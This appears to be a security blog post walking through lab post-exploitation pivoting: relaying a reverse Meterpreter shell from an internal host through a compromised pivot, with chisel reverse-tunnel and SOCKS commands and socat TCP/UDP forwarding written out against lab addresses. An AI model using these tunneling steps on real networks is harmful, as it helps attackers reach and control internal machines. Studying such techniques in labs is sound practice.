Open in app

Sign in

Write

Sign in

Metasploit: Portproxy(tunneling meterpreter session inside another meterpreter session)+socat+chisel

n00🔑
3 min readApr 24, 2021

Hi readers, here we will see how we can get reverse meterpreter shell from a internal machine(which is not connected to internet). For more understanding this article can be followed after reading previous article(https://pswalia2u.medium.com/pivoting-metasploit-proxychains-85d18ce5bf2d)

Prerequisites:

Already compromised system(Pivot) with meterpreter session with already autoroute configured for next machine(10.100.11.100).

Network architecture:

  1. Setting up portproxy module:

2. Exploiting a vulnerability and configuring the exploit module

Here we have exploited apache tomcat server(uploaded payload via tomacat manager) running on port 8443 on our target(10.100.11.100).

3. Networking info for better understanding:

a. Attacker:

b. Pivot Machine:

c. Target:

Note: portproxy module is only for windows pivot machines. For unix/linux I prefer socat for forwarding tcp traffic to specific IP.(socat must be installed on pivot for this to work)

socat TCP-LISTEN:8888,fork TCP:172.16.40.9:8889

Here Any tcp traffic we get on 0.0.0.0:8888 will be forwarded to 172.16.40.9 on port 8889.

Similar thing we can do using chisel(need to transfer chisel binary):

CHISEL(https://github.com/jpillora/chisel):

Port forwarding-

  1. On local attacker’s kali box(10.10.14.23) we start chisel server listening on port 8888.
./chisel server -p 8888 --reverse

2. On machine where we need to do forwarding(172.17.0.6) we start chisel client specifying server(10.10.14.23:8888) and remote machine(172.17.0.4:3000) details where we we need to forward traffic.

./chisel client 10.10.14.23:8888 R:3000:172.17.0.4:3000

On server side we can check chisel server started listening on port 127.0.0.1:3000.

Our tunnel has been setup successfully. Now any traffic sent to 127.0.0.1:3000 from 10.10.14.23 will be forwarded to 172.17.0.4:3000

SOCKS Proxy-

  1. Start chisel server on kali box:
chisel server -p 1433 --reverse

2. Start chisel client on pivot box:

./chisel64 client 192.168.119.156:1433 R:socks

3. Check Socks server created on kali box -

Lab details:

INE LAB 19 (Leveraging PowerShell During Exploitation)

Exposing LDAP via chsiel:

chisel server -p 8001 --reverse
./chisel64 client 10.10.14.35:8001 R:389:127.0.0.1:389

Exposing RPC port 111, UDP port forwarding socat:

Server side:

socat tcp4-listen:5353,reuseaddr,fork UDP:10.254.100.58:111

Client side:

socat udp4-listen:111,reuseaddr,fork tcp:9.42.116.123:5353

Thanks for reading!

Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)

Metasploit
Post Exploitation
Pivoting

--

--

n00🔑

Written by n00🔑

278 Followers

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams